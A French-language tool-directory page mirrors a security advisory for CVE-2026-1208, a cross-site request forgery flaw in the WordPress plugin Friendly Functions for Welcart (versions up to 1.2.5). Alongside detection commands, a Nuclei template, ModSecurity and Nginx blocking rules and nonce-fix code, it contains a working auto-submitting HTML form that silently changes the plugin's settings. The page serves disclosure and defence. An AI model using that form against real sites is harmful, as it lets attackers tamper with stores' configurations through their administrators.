Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-1208 — Friendly Functions for Welcart <= 1.2.5 - Falsification de requête intersite pour mise à jour des paramètres | Kitploit
Outils/GitHubGitHub/snailsploit/cve-2026-1208
Analyse des VulnérabilitésExploitationSécurité WebTests d'IntrusionArticles et RechercheApprentissage et Éducation
GitHubsnailsploit/cve-2026-1208

CVE-2026-1208

Friendly Functions for Welcart <= 1.2.5 - Falsification de requête intersite pour mise à jour des paramètres

Voir le dépôt
il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-1208 : Falsification de requête intersite dans Friendly Functions pour Welcart

CVE CVSS Score WordPress Plugin CWE-352 Wordfence

Mots-clés : CVE-2026-1208, vulnérabilité Friendly Functions for Welcart, CSRF, falsification de requête intersite, sécurité WordPress, vulnérabilité de plugin WordPress, CWE-352, sécurité Welcart, manipulation des paramètres, WordPress CVE 2026

Table des matières

  • Aperçu
  • Détails de la vulnérabilité
  • Analyse technique
  • Vecteur d'attaque
  • Preuve de concept
  • Guide de remédiation
  • Métriques CVSS
  • Références
  • Contact sécurité

Aperçu

Vulnérabilité CSRF du plugin WordPress Friendly Functions for Welcart (CVE-2026-1208) - Défaut de sécurité permettant à des attaquants non authentifiés de modifier les paramètres du plugin via des requêtes forgées.

Une vulnérabilité de type falsification de requête intersite (CSRF) a été découverte dans le plugin Friendly Functions for Welcart ; elle permet à des attaquants non authentifiés de modifier les paramètres du plugin en trompant un administrateur pour qu'il clique sur un lien malveillant.

Découverte par : Kai Aizen (SnailSploit)
Publié : 23 janvier 2026
Score CVSS : 4.3 (Moyen)
CWE : CWE-352 - Falsification de requête intersite (CSRF)
Plugin : Friendly Functions for Welcart
Type d'attaque : Falsification de requête intersite vers mise à jour des paramètres
Privilèges requis : Aucun (attaque non authentifiée + ingénierie sociale)

Détails de la vulnérabilité

Description

Le plugin Friendly Functions for Welcart pour WordPress est vulnérable à une falsification de requête intersite dans toutes les versions jusqu'à la version 1.2.5 incluse. Cela est dû à une validation de nonce manquante ou incorrecte sur la page des paramètres. Ainsi, des attaquants non authentifiés peuvent modifier les paramètres du plugin via une requête forgée, à condition de pouvoir tromper un administrateur du site pour qu'il exécute une action telle que cliquer sur un lien.

Impact

Cette vulnérabilité permet à des attaquants non authentifiés de :

  • Modifier les paramètres du plugin sans autorisation
  • Manipuler les fonctionnalités e-commerce de Welcart
  • Potentiellement perturber les opérations de la boutique
  • Chaîner avec d'autres vulnérabilités pour des attaques à plus grande échelle

Versions affectées

  • Vulnérables : Toutes les versions ≤ 1.2.5
  • Corrigées : Version 1.2.6 et ultérieures

Métriques CVSS v3.1

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Détails techniques

La vulnérabilité existe dans l'implémentation de la page des paramètres, où :

  1. Le formulaire de paramètres du plugin manque de validation de nonce correcte
  2. Les requêtes de mise à jour des paramètres sont traitées sans vérifier l'origine de la requête
  3. Aucun jeton CSRF n'est généré ni validé
  4. Des actions administratives peuvent être effectuées via des requêtes cross-origin

Emplacements du code vulnérable

La vulnérabilité a été identifiée aux emplacements suivants :

  • ffw_function_settings.php - Ligne 53
  • ffw_function_settings.php - Ligne 58

Vecteur d'attaque

L'attaque nécessite de l'ingénierie sociale pour tromper un administrateur authentifié afin qu'il visite une page malveillante ou clique sur un lien conçu à cet effet alors qu'il est connecté à son site WordPress.

root@kitploit:~
Target: WordPress Admin with Friendly Functions for Welcart installed
Method: Malicious HTML page with auto-submitting form
Trigger: Administrator clicks link or visits attacker-controlled page

Preuve de concept

Payload CSRF HTML

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
    <title>CVE-2026-1208 - CSRF PoC</title>
</head>
<body>
    <h1>Loading...</h1>
    <form id="csrf-form" action="https://TARGET_SITE/wp-admin/admin.php?page=ffw-settings" method="POST">
        <input type="hidden" name="ffw_setting_option" value="malicious_value" />
        <!-- Add additional setting fields as needed -->
    </form>
    <script>
        document.getElementById('csrf-form').submit();
    </script>
</body>
</html>

⚠️ Avertissement : Cette preuve de concept est fournie à des fins éducatives et de test autorisé uniquement.

Étapes de test

  1. Installer une instance WordPress avec Friendly Functions for Welcart <= 1.2.5
  2. Héberger le payload CSRF sur un serveur contrôlé par l'attaquant
  3. S'authentifier en tant qu'administrateur sur le site WordPress cible
  4. Visiter la page contrôlée par l'attaquant (simulant un clic sur un lien malveillant)
  5. Constater que les paramètres du plugin sont modifiés sans consentement explicite

Détection

Vérification du plugin WordPress

root@kitploit:~
# Check if vulnerable version is installed
wp plugin list | grep -i "friendly-functions-for-welcart"

# Get specific version
wp plugin get friendly-functions-for-welcart --field=version

Règles de scanner de sécurité

Modèle Nuclei :

root@kitploit:~
id: CVE-2026-1208

info:
  name: Friendly Functions for Welcart - CSRF to Settings Update
  author: SnailSploit
  severity: medium
  description: |
    Friendly Functions for Welcart plugin for WordPress is vulnerable 
    to CSRF in versions <= 1.2.5 due to missing nonce validation.
  reference:
    - https://github.com/SnailSploit/CVE-2026-1208
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/friendly-functions-for-welcart/friendly-functions-for-welcart-125-cross-site-request-forgery-to-settings-update
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
    cvss-score: 4.3
    cve-id: CVE-2026-1208
    cwe-id: CWE-352
  tags: cve,cve2026,wordpress,wp-plugin,csrf,welcart

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/friendly-functions-for-welcart/readme.txt"
    
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Friendly Functions for Welcart"
      
      - type: regex
        regex:
          - "(?i)Stable tag:\\s*(1\\.([0-1]\\.[0-9]|2\\.[0-5]))"
      
      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: version
        group: 1
        regex:
          - "(?i)Stable tag:\\s*([0-9.]+)"

Règles de pare-feu d'application web

Règle ModSecurity :

root@kitploit:~
# CVE-2026-1208 - Block CSRF attempts to FFW settings
SecRule REQUEST_URI "@contains /wp-admin/admin.php" \
    "chain,id:2026001,phase:2,t:none,t:urlDecodeUni,\
    log,deny,status:403,msg:'CVE-2026-1208 CSRF Attempt Blocked'"
    SecRule ARGS:page "@streq ffw-settings" \
        "chain"
        SecRule &REQUEST_HEADERS:Referer "@eq 0"

# Alternative: Block if referer doesn't match site domain
SecRule REQUEST_URI "@contains /wp-admin/admin.php" \
    "chain,id:2026002,phase:2,t:none,\
    log,deny,status:403,msg:'CVE-2026-1208 Cross-Origin Request Blocked'"
    SecRule ARGS:page "@streq ffw-settings" \
        "chain"
        SecRule REQUEST_HEADERS:Referer "!@contains yourdomain.com"

Règle Nginx :

root@kitploit:~
# CVE-2026-1208 - CSRF Protection for FFW Settings
location /wp-admin/admin.php {
    # Check for ffw-settings page without proper referer
    if ($arg_page = "ffw-settings") {
        set $csrf_check "1";
    }
    if ($http_referer !~ "^https?://(www\.)?yourdomain\.com") {
        set $csrf_check "${csrf_check}1";
    }
    if ($csrf_check = "11") {
        return 403;
    }
    
    # Pass to PHP handler
    try_files $uri =404;
    fastcgi_pass php-fpm;
    include fastcgi_params;
}

Remédiation

Pour les administrateurs de site

Action immédiate requise :

  1. Mettez immédiatement à jour Friendly Functions for Welcart vers la version 1.2.6 ou ultérieure
  2. Vérifiez les paramètres du plugin de votre site pour toute modification non autorisée
  3. Si vous ne pouvez pas mettre à jour immédiatement, envisagez de désactiver temporairement le plugin

Instructions de mise à jour

  1. Accédez à Plugins > Plugins installés dans l'administration WordPress
  2. Localisez « Friendly Functions for Welcart »
  3. Cliquez sur Mettre à jour maintenant pour passer à la version 1.2.6 ou ultérieure
  4. Vérifiez que la mise à jour a réussi
  5. Vérifiez et confirmez que les paramètres de votre plugin sont corrects

Pour les développeurs

Assurez-vous que tous les formulaires de paramètres implémentent une protection CSRF adéquate :

root@kitploit:~
// Example of proper CSRF protection in WordPress
// In your form:
wp_nonce_field('ffw_settings_update', 'ffw_settings_nonce');

// In your form handler:
function process_settings_update() {
    // Verify nonce
    if (!isset($_POST['ffw_settings_nonce']) || 
        !wp_verify_nonce($_POST['ffw_settings_nonce'], 'ffw_settings_update')) {
        wp_die('Security check failed');
    }
    
    // Check capabilities
    if (!current_user_can('manage_options')) {
        wp_die('Unauthorized');
    }
    
    // Process settings update
    // ...
}

Chronologie

  • 23 janvier 2026 - Vulnérabilité divulguée publiquement
  • 23 janvier 2026 - CVE-2026-1208 attribué
  • Version 1.2.6 - Correctif publié par l'éditeur du plugin

Références

  • Entrée de la base de données Wordfence Intelligence
  • WordPress Plugin Trac - Ligne 53
  • WordPress Plugin Trac - Ligne 58
  • Modification du plugin (correctif)
  • Entrée CVE MITRE

Crédits

Chercheur :

  • Kai Aizen - SnailSploit

Processus de divulgation : Coordonné via le programme Bug Bounty de Wordfence

Avertissement

Ces informations sont fournies uniquement à des fins de recherche en sécurité et de défense. Toute exploitation de cette vulnérabilité à des fins malveillantes est illégale et contraire à l'éthique. Obtenez toujours une autorisation appropriée avant de tester des systèmes qui ne vous appartiennent pas.

Contact

Pour toute question ou information supplémentaire sur cette vulnérabilité :

  • E-mail : [email protected]
  • Site web : snailsploit.com
  • Organisation : SnailSploit Security Research

Dernière mise à jour : 23 janvier 2026


📚 Documentation et auteur

Le rapport complet, la méthodologie et les recherches connexes de ce projet se trouvent sur :

https://snailsploit.com/security-research/cves/cve-2026-1208/

Créé par Kai Aizen — chercheur indépendant en sécurité offensive.

snailsploit.com · Recherche · Frameworks · GitHub · LinkedIn · ResearchGate · X/Twitter

Même attaque. Substrat différent.

Télécharger l’outil
MétriqueValeur
Vecteur d'attaqueRéseau (AV:N)
Complexité de l'attaqueFaible (AC:L)
Privilèges requisAucun (PR:N)
Interaction de l'utilisateurRequise (UI:R)
PérimètreInchangé (S:U)
ConfidentialitéAucune (C:N)
IntégritéFaible (I:L)
DisponibilitéAucune (A:N)